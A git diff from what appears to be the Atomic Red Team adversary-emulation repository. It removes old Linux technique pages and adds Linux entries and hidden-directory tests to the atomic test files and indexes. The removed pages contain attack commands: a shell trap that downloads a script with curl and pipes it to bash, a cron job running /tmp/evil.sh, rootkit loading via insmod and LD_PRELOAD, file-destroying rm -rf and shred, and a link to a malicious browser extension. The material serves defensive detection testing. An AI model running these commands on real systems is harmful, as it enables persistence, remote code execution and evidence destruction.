diff --git a/Linux/Defense_Evasion/File_Deletion.md b/Linux/Defense_Evasion/File_Deletion.md
deleted file mode 100644
index c364bd5e..00000000
--- a/Linux/Defense_Evasion/File_Deletion.md
+++ /dev/null
@@ -1,23 +0,0 @@
-## File Deletion
-
-MITRE ATT&CK Technique: [T1107](https://attack.mitre.org/wiki/Technique/T1107)
-
-### Victim Configuration
-
- echo "This file will be shredded" > /tmp/victim-shred.txt
- mkdir /tmp/victim-files
- cd /tmp/victim-files
- touch a b c d e f g
-
-### Delete a single file
-
- rm -f /tmp/victim-files/a
-
-### Delete an entire folder
-
- rm -rf /tmp/victim-files
-
-### Overwrite and delete a file with shred
-
- shred -u /tmp/victim-shred.txt
-
diff --git a/Linux/Defense_Evasion/Rootkits.md b/Linux/Defense_Evasion/Rootkits.md
deleted file mode 100644
index 06becd24..00000000
--- a/Linux/Defense_Evasion/Rootkits.md
+++ /dev/null
@@ -1,21 +0,0 @@
-## Rootkits
-
-MITRE ATT&CK Technique: [T1014](https://attack.mitre.org/wiki/Technique/T1014)
-
-### Loadable Kernel Module based Rootkit
-
-Input:
-
- sudo insmod MODULE.ko
-
-OR
-
-Input:
-
- sudo modprobe MODULE.ko
-
-### LD_PRELOAD based Rootkit
-
-Input:
-
- export LD_PRELOAD=$PWD/libmy_r00tkit.so
\ No newline at end of file
diff --git a/Linux/Lateral_Movement/Remote_File_Copy.md b/Linux/Lateral_Movement/Remote_File_Copy.md
deleted file mode 100644
index 288f77db..00000000
--- a/Linux/Lateral_Movement/Remote_File_Copy.md
+++ /dev/null
@@ -1,35 +0,0 @@
-# Remote File Copy
-
-MITRE ATT&CK Technique: [T1105](https://attack.mitre.org/wiki/Technique/T1105)
-
-## Adversary System Configuration
-### Ensure SSH access has been configured for an adversary account
- echo "This file transferred by scp" > /tmp/adversary-scp
- echo "This file transferred by sftp" > /tmp/adversary-sftp
- mkdir /tmp/adversary-rsync
- cd /tmp/adversary-rsync
- touch a b c d e f g
-
-## Victim System Configuration
-### Ensure SSH access has been configured for a victim account
-### Ensure write access for victim account to this directory
- mkdir /tmp/victim-files
- cd /tmp/victim-files
-
-## Push files to victim using rsync
- rsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files/
-
-## Pull files from adversary using rsync
- rsync -r adversary@adversary-host:/tmp/adversary-rsync/ /tmp/victim-files/
-
-## Push files to victim using scp
- scp /tmp/adversary-scp victim@victim-host:/tmp/victim-files/
-
-## Pull file from adversary using scp
- scp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/scp-file
-
-## Push files to victim using sftp
- sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp'
-
-## Pull file from adversary using sftp
- sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file
diff --git a/Linux/Persistence/Browser_Extensions.md b/Linux/Persistence/Browser_Extensions.md
deleted file mode 100644
index 3550fb8c..00000000
--- a/Linux/Persistence/Browser_Extensions.md
+++ /dev/null
@@ -1,24 +0,0 @@
-## Browser Extensions
-
-MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
-
-
-### Chrome (Developer Mode)
-
-Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
-
-Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
-
-Then click 'Select'
-
-### Chrome (Chrome Web Store)
-
-Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
-
-### Firefox
-
-Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
-
-Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
-
-Then click 'Open'
\ No newline at end of file
diff --git a/Linux/Persistence/Cron_Job.md b/Linux/Persistence/Cron_Job.md
deleted file mode 100644
index 09435f6a..00000000
--- a/Linux/Persistence/Cron_Job.md
+++ /dev/null
@@ -1,6 +0,0 @@
-# Cron Job
-
-MITRE ATT&CK Technique: [T1168](https://attack.mitre.org/wiki/Technique/T1168)
-
-
- echo "* * * * * /tmp/evil.sh" > /tmp/persistevil && crontab /tmp/persistevil
diff --git a/Linux/Persistence/Hidden_Files_and_Directories.md b/Linux/Persistence/Hidden_Files_and_Directories.md
deleted file mode 100644
index 7a9100aa..00000000
--- a/Linux/Persistence/Hidden_Files_and_Directories.md
+++ /dev/null
@@ -1,22 +0,0 @@
-# Hidden Files and Directories
-
-MITRE ATT&CK Technique: [T1158](https://attack.mitre.org/wiki/Technique/T1158)
-
-To create visible directories and files
-
- mkdir visible-directory
- echo "this file is visible" > visible-directory/visible-file
-
- # List the contents the current directory and visible directory
- ls
- ls visible-directory
-
-
-To create hidden directories and files
-
- mkdir .hidden-directory
- echo "this file is hidden" > .hidden-directory/.hidden-file
-
- # List the contents the current directory and hidden directory
- ls -la
- ls -la .hidden-directory
\ No newline at end of file
diff --git a/Linux/Persistence/Trap.md b/Linux/Persistence/Trap.md
deleted file mode 100644
index cc3a46f4..00000000
--- a/Linux/Persistence/Trap.md
+++ /dev/null
@@ -1,10 +0,0 @@
-# Trap
-
-MITRE ATT&CK Technique: [T1154](https://attack.mitre.org/wiki/Technique/T1154)
-
-
- trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Linux/Payloads/echo-art-fish.sh | bash' EXIT
-
- exit
-
-After exiting the shell, the script will download and execute.
\ No newline at end of file
diff --git a/Linux/Persistence/bash_profile_and_bashrc.md b/Linux/Persistence/bash_profile_and_bashrc.md
deleted file mode 100644
index c09c8a1f..00000000
--- a/Linux/Persistence/bash_profile_and_bashrc.md
+++ /dev/null
@@ -1,6 +0,0 @@
-# .bash_profile and .bashrc
-
-MITRE ATT&CK Technique: [T1156](https://attack.mitre.org/wiki/Technique/T1156)
-
- echo "/path/to/script.py" >> ~/.bash_profile
- echo "/path/to/script.py" >> ~/.bashrc
diff --git a/Linux/Privilege_Escalation/Setuid_and_Setgid.md b/Linux/Privilege_Escalation/Setuid_and_Setgid.md
deleted file mode 100644
index e785a5d2..00000000
--- a/Linux/Privilege_Escalation/Setuid_and_Setgid.md
+++ /dev/null
@@ -1,15 +0,0 @@
-# Setuid and Setgid
-
-MITRE ATT&CK Technique: [T1166](https://attack.mitre.org/wiki/Technique/T1166)
-
-Navigate to [hello.c](../Payloads/hello.c)
-
-Input:
-
- make hello
-
- sudo chown root hello
-
- sudo chmod u+s hello
-
- ./hello
\ No newline at end of file
diff --git a/atomics/T1156/T1156.md b/atomics/T1156/T1156.md
index 5a5f8439..3dbda9a2 100644
--- a/atomics/T1156/T1156.md
+++ b/atomics/T1156/T1156.md
@@ -24,7 +24,7 @@ Permissions Required: User, Administrator
## Atomic Test #1 - .bash_profile and .bashrc
xxx
-**Supported Platforms:** macOS
+**Supported Platforms:** macOS, Linux
#### Inputs
diff --git a/atomics/T1156/T1156.yaml b/atomics/T1156/T1156.yaml
index a9fdaf14..48dd19fa 100644
--- a/atomics/T1156/T1156.yaml
+++ b/atomics/T1156/T1156.yaml
@@ -9,6 +9,7 @@ atomic_tests:
supported_platforms:
- macos
+ - linux
input_arguments:
script:
diff --git a/atomics/T1158/T1158.md b/atomics/T1158/T1158.md
index 988733be..8e8314bd 100644
--- a/atomics/T1158/T1158.md
+++ b/atomics/T1158/T1158.md
@@ -41,6 +41,10 @@ Permissions Required: User
- [Atomic Test #6 - Show all hidden files](#atomic-test-6---show-all-hidden-files)
+- [Atomic Test #7 - Create visible Directories](#atomic-test-7---create-visible-directories)
+
+- [Atomic Test #8 - Create hidden directories and files](#atomic-test-8---create-hidden-directories-and-files)
+
@@ -127,3 +131,35 @@ xxx
defaults write com.apple.finder AppleShowAllFiles YES
```
+
+
+## Atomic Test #7 - Create visible Directories
+xxx
+
+**Supported Platforms:** macOS, Linux
+
+
+#### Run it with `sh`!
+```
+mkdir visible-directory
+echo "this file is visible" > visible-directory/visible-file
+ls
+ls visible-directory
+```
+
+
+
+## Atomic Test #8 - Create hidden directories and files
+xxx
+
+**Supported Platforms:** macOS, Linux
+
+
+#### Run it with `sh`!
+```
+mkdir .hidden-directory
+echo "this file is hidden" > .hidden-directory/.hidden-file
+ls -la
+ls -la .hidden-directory
+```
+
diff --git a/atomics/T1158/T1158.yaml b/atomics/T1158/T1158.yaml
index adf48593..95fdc5b3 100644
--- a/atomics/T1158/T1158.yaml
+++ b/atomics/T1158/T1158.yaml
@@ -84,3 +84,35 @@ atomic_tests:
name: sh
command: |
defaults write com.apple.finder AppleShowAllFiles YES
+
+- name: Create visible Directories
+ description: |
+ xxx
+
+ supported_platforms:
+ - macos
+ - linux
+
+ executor:
+ name: sh
+ command: |
+ mkdir visible-directory
+ echo "this file is visible" > visible-directory/visible-file
+ ls
+ ls visible-directory
+
+- name: Create hidden directories and files
+ description: |
+ xxx
+
+ supported_platforms:
+ - macos
+ - linux
+
+ executor:
+ name: sh
+ command: |
+ mkdir .hidden-directory
+ echo "this file is hidden" > .hidden-directory/.hidden-file
+ ls -la
+ ls -la .hidden-directory
diff --git a/atomics/index.md b/atomics/index.md
index 4af93d2a..0bf6845b 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -1,7 +1,7 @@
# All Atomic Tests by ATT&CK Tactic & Technique
# persistence
- [T1156 .bash_profile and .bashrc](./T1156/T1156.md)
- - Atomic Test #1: .bash_profile and .bashrc [macos]
+ - Atomic Test #1: .bash_profile and .bashrc [macos, linux]
- [T1015 Accessibility Features](./T1015/T1015.md)
- Atomic Test #1: Attaches Command Prompt As Debugger To Process [windows]
- [T1182 AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
@@ -37,6 +37,8 @@
- Atomic Test #4: Hidden files [macos]
- Atomic Test #5: Hide a Directory [macos]
- Atomic Test #6: Show all hidden files [macos]
+ - Atomic Test #7: Create visible Directories [macos, linux]
+ - Atomic Test #8: Create hidden directories and files [macos, linux]
- [T1179 Hooking](./T1179/T1179.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- [T1062 Hypervisor](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
@@ -167,6 +169,8 @@
- Atomic Test #4: Hidden files [macos]
- Atomic Test #5: Hide a Directory [macos]
- Atomic Test #6: Show all hidden files [macos]
+ - Atomic Test #7: Create visible Directories [macos, linux]
+ - Atomic Test #8: Create hidden directories and files [macos, linux]
- [T1147 Hidden Users](./T1147/T1147.md)
- Atomic Test #1: Hidden Users [macos]
- [T1143 Hidden Window](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
diff --git a/atomics/linux-index.md b/atomics/linux-index.md
index 1eeb45d1..4f199149 100644
--- a/atomics/linux-index.md
+++ b/atomics/linux-index.md
@@ -1,6 +1,7 @@
# Linux Atomic Tests by ATT&CK Tactic & Technique
# persistence
- [T1156 .bash_profile and .bashrc](./T1156/T1156.md)
+ - Atomic Test #1: .bash_profile and .bashrc [macos, linux]
- [T1067 Bootkit](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1176 Browser Extensions](./T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
@@ -11,6 +12,8 @@
- [T1158 Hidden Files and Directories](./T1158/T1158.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #3: Hidden file [macos, linux]
+ - Atomic Test #7: Create visible Directories [macos, linux]
+ - Atomic Test #8: Create hidden directories and files [macos, linux]
- [T1215 Kernel Modules and Extensions](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1168 Local Job Scheduling](./T1168/T1168.md)
- Atomic Test #1: Cron Job [macos, centos, ubuntu, linux]
@@ -128,6 +131,8 @@
- [T1158 Hidden Files and Directories](./T1158/T1158.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #3: Hidden file [macos, linux]
+ - Atomic Test #7: Create visible Directories [macos, linux]
+ - Atomic Test #8: Create hidden directories and files [macos, linux]
- [T1066 Indicator Removal from Tools](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1070 Indicator Removal on Host](./T1070/T1070.md)
- Atomic Test #3: rm -rf [macos, linux]
diff --git a/atomics/macos-index.md b/atomics/macos-index.md
index 5c0868e6..226b96b4 100644
--- a/atomics/macos-index.md
+++ b/atomics/macos-index.md
@@ -1,7 +1,7 @@
# macOS Atomic Tests by ATT&CK Tactic & Technique
# persistence
- [T1156 .bash_profile and .bashrc](./T1156/T1156.md)
- - Atomic Test #1: .bash_profile and .bashrc [macos]
+ - Atomic Test #1: .bash_profile and .bashrc [macos, linux]
- [T1176 Browser Extensions](./T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
@@ -16,6 +16,8 @@
- Atomic Test #4: Hidden files [macos]
- Atomic Test #5: Hide a Directory [macos]
- Atomic Test #6: Show all hidden files [macos]
+ - Atomic Test #7: Create visible Directories [macos, linux]
+ - Atomic Test #8: Create hidden directories and files [macos, linux]
- [T1215 Kernel Modules and Extensions](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1161 LC_LOAD_DYLIB Addition](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1159 Launch Agent](./T1159/T1159.md)
@@ -190,6 +192,8 @@
- Atomic Test #4: Hidden files [macos]
- Atomic Test #5: Hide a Directory [macos]
- Atomic Test #6: Show all hidden files [macos]
+ - Atomic Test #7: Create visible Directories [macos, linux]
+ - Atomic Test #8: Create hidden directories and files [macos, linux]
- [T1147 Hidden Users](./T1147/T1147.md)
- Atomic Test #1: Hidden Users [macos]
- [T1143 Hidden Window](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)